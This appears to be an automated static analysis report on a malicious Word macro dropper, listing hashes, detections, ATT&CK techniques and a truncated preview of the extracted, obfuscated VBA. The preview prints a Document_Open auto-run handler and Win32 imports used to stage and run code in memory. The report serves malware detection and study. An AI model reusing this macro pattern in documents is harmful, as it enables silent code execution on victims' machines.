Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8c8390904b5e75a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 172.5 KB
Created: 2017-12-10 08:33:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 0f3a9bf5e81cdaee255fd1d4b6b31ebf
SHA-1: 36af49687d84e204eb69d4c1942f483bfb62988c
SHA-256: c8c8390904b5e75acfd73e0cbef92e327658c4a0d7a31d95b89d886ff0ff046e
Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros, including a Document_Open macro, which runs automatically when the document is opened and therefore indicates an attempt to execute code without further user interaction. The VBA code is heavily obfuscated (randomized, mixed-case identifiers and a long chain of trivially nested functions), which suggests the macro is designed to download and execute a secondary payload, a common technique for malware droppers. The Win32 imports declared in the extracted macro (HeapCreate, HeapAlloc, RtlMoveMemory and CallWindowProcW) point to in-memory staging and execution of code, further supporting this assessment.

Heuristics (4)

  • ClamAV: Doc.Dropper.Agent-6400143-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6400143-0
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro present; it runs automatically when the document is opened
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body; this is the standard DrawingML XML namespace URI rather than a network indicator)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 78241 bytes
SHA-256: 3c9a368c59bdcd32142c15582c7b12312d43085d045f265c00bac7f0d2b23416

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Vba7 Then
PRIVate DeCLaRe PTrsafE FunCTIOn QFlm2dNcITrWeNVo03ro lIB "UsEr32" aLiAs "CallWindowProcW" (byvAl fmS7VYcVzYmRTs As LOnGpTR, BYvAl XketR46D aS lONGpTr, bYVAL oaHn as LonG, BYVal b20xbu As LONgptR, bYVal fOWfDAe9XOSjhC aS loNgPtr)  aS lONgPtR
PriVATE decLaRE pTrSAfe fUnCtiON zXmCvbMILN lib "KeRNeL32" aLIas "HeapCreate" (bYvaL zBWMB AS Long, ByvAl ZC65TWQzDI aS loNgPtr, byVaL F40Dz6aLnO As LONgptR)  AS longPTR
prIvATe DeCLare pTRSaFe FUnctIoN KfH8yJTuodzOM5JgQrvE lIb "kERNEl32" alIaS "HeapAlloc" (Byval MmhTE0 as LoNgPTr, ByVal S6RFOm aS LOng, bYvaL TLE As lONgptr)  aS lOngPTR
priVATe DecLaRe pTRSAfe SUb FRI6v94whT lIB "kErNEl32" aliAS "RtlMoveMemory" (NxS aS any, byReF MR3MkjHgM9xS8 AS anY, BYVal s17 as LonG)

#Else
Private Declare Function qfLm2DNcItRWenvo03RO Lib "usEr32" Alias "CallWindowProcW" (ByVal iEXbM6Zt As Long, ByVal WxbyCvT As Long, ByVal vAqTNm As Long, ByVal sTVYApxGkdJ As Long, ByVal m33AW5VA2ZpS0Hx As Long) As Long
Private Declare Function ZXmcvBmILn Lib "KeRneL32" Alias "HeapCreate" (ByVal fket As Long, ByVal csvh40BH As Long, ByVal ybn As Long) As Long
Private Declare Function KfH8yJTuodzOM5JgQrvE Lib "KeRneL32" Alias "HeapAlloc" (ByVal HIc3vi As Long, ByVal rj2 As Long, ByVal XSGB As Long) As Long
Private Declare Sub FrI6V94wht Lib "KeRneL32" Alias "RtlMoveMemory" (tdge3tmWn9C6R As Any, ByRef I5bmO As Any, ByVal InZOc As Long)

#End If

Sub dOcUMeNt_OPen()
Call FjqQ3jagNrSSVdY8x5cKPB
End Sub
Private Function FjqQ3jagNrSSVdY8x5cKPB() As Double
Call Oa95Kkbvc4PziElL6k5hGEN
End Function
Private Function Oa95Kkbvc4PziElL6k5hGEN() As Integer
Call W9TSajxymLfoKnvGI9vwI9jI
End Function
Static Function W9TSajxymLfoKnvGI9vwI9jI() As Variant
Call X1mqLzcYtZi6
End Function
Private Function X1mqLzcYtZi6() As Boolean
Call KCTDikvjG6JFuOJhIM5
End Function
Function KCTDikvjG6JFuOJhIM5() As Object
Call wFjiWZfq4N3S4lDa6rrukz
End Function
Function wFjiWZfq4N3S4lDa6rrukz() As String
Call gdZO2PZioX9KkVvkW1
End Function
Private Function gdZO2PZioX9KkVvkW1() As Date
Call RP6U5hAiJhQOBrucr5
End Function
Static Function RP6U5hAiJhQOBrucr5() As Double
Call WW3pagLLsaTrEMjbC09
End Function
Function WW3pagLLsaTrEMjbC09() As Byte
Call fss3lWYF1s41zwa9T4cxFi0DB
End Function
Public Function fss3lWYF1s41zwa9T4cxFi0DB() As String
Call YW75YejJ6UNJwQvXUcpXY
End Function
Static Function YW75YejJ6UNJwQvXUcpXY() As Single
Call uTrs8zRkurfS
End Function
Sub uTrs8zRkurfS()
Call ixJUiVD02V5q
End Sub
Static Function ixJUiVD02V5q() As Double
Call iS35UktV62HBwgHFiiv
End Function
Function iS35UktV62HBwgHFiiv() As Object
Call EhPyublqQfHkcxhE6N1ic9
End Function
Function EhPyublqQfHkcxhE6N1ic9() As Object
Call kbjoYFxuopNu8ldYUT
End Function
Private Function kbjoYFxuopNu8ldYUT() As Double
Call OmtXWgvPw8nfYOLZqydlisN
End Function
Private Function OmtXWgvPw8nfYOLZqydlisN() As Double
Call Gs1hoIxDM8BByUNvEgVDuwH
End Function
Private Function Gs1hoIxDM8BByUNvEgVDuwH() As Double
Call m6l9O2bnmWvLWi3L2Ud3C2Z
End Function
Private Function m6l9O2bnmWvLWi3L2Ud3C2Z() As Integer
Call iPRKIjLOoZRWiZHC8HnCYdRY
End Function
Static Function iPRKIjLOoZRWiZHC8HnCYdRY() As Currency
Call XiuFXuyblI41dgMDXyqNX
End Function
Static Function XiuFXuyblI41dgMDXyqNX() As Double
Call SGTn8G3X20ZdCOZLwujHckB
End Function
Private Function SGTn8G3X20ZdCOZLwujHckB() As Date
Call hPMmvReCXX0sTp2oNp
End Function
Static Function hPMmvReCXX0sTp2oNp() As Integer
Call qtPaO3XQ6rdM65Dy6pfA
End Function
Public Function qtPaO3XQ6rdM65Dy6pfA() As Boolean
Call JNKUnTqipdyS1R
End Function
Public Function JNKUnTqipdyS1R() As Object
Call guNXsOnzQqVZAatz0sJdS
End Function
Static Function guNXsOnzQqVZAatz0sJdS() As Single
Call q1BqcXfcgV3s
End Function
Public Function q1BqcXfcgV3s() As Long
Call TQ0rJq
... (truncated)